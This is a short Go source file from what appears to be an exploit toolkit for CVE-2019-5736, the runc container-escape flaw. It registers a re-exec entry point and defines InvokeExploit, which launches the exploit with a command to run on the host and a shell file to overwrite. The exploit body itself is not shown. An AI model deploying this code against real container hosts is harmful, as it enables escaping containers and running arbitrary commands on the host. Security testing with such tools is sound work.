package CVE_2019_5736

import (
	"os"

	"github.com/docker/docker/pkg/reexec"
	"github.com/pkg/errors"
	"github.com/ssst0n3/awesome_libs/awesome_error"
	"github.com/ssst0n3/awesome_libs/log"
)

func init() {
	reexec.Register(ExpName, Exploit)
}

func InvokeExploit(cmdOnHost string, replaceShFileName string, debug bool) (err error) {
	debugArg := "--debug"
	if !debug {
		debugArg += "=false"
	}
	cmd := reexec.Command(ExpName, debugArg, "--cmd", cmdOnHost, "--wsh", replaceShFileName)
	log.Logger.Debug(cmd.Path)
	cmd.Stderr = os.Stderr
	cmd.Stdout = os.Stdout

	if err := cmd.Run(); err != nil {
		err = errors.Wrap(err, "cve-2019-5736 error on re-exec cmd")
		awesome_error.CheckErr(err)
		return err
	}
	return
}
